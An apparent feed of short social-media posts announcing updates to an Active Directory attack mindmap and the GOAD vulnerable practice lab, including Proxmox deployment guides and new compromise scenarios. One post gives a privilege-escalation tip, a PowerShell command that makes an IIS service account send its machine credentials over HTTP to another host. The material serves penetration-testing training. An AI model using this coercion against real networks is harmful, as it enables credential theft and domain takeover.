Welcome to the new AD Mindmap upgrade !
v2022_11 will be dark only (this is too painful to maintain two versions).
Thx again to : @Vikingfr and @Sant0rryu for their help 👍
Full quality and zoomable version here :
orange-cyberdefense.github.io/ocd-mindmaps/i…
Overview :
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
A new Lab 🏰 is available on GOAD: NHA.
This time it is a challenge, 5 vms, you start with no account and try to get domain admin on the two domains.
github.com/Orange-Cyberde…
Have fun !
Complete guide to deploy GOAD on Proxmox is ready 🥳
- part 1: Proxmox + pfsense
- part 2: template with packer
- part 3: providing with terraform
- part 4: provisioning with ansible
- part 5: add openvpn access
github.com/Orange-Cyberde…
=> mayfly277.github.io/categories/pro…
GOAD update available 🥳
- Azure provider is now supported thx to @Zeph_RooT !
- Two versions of the lab are available (A light version with 3 computers has been added).
- Some scripts to help install.
- Refactoring to simplify adding lab and providers.
github.com/Orange-Cyberde…
Goad small update ! 🏰 🥳
i added scenarios to complete some compromise path.
- files with secrets in shares
- gmsa account
- asrep account on essos
- write dacl on container
- unconstrained delegation on user
- protected user
- sensitive user
- ppl
github.com/Orange-Cyberde…
If you want to play with an Active Directory lab.
Here is the "Game Of Active Directory" project.
Still a lot of stuff to add but already fun to play with ;)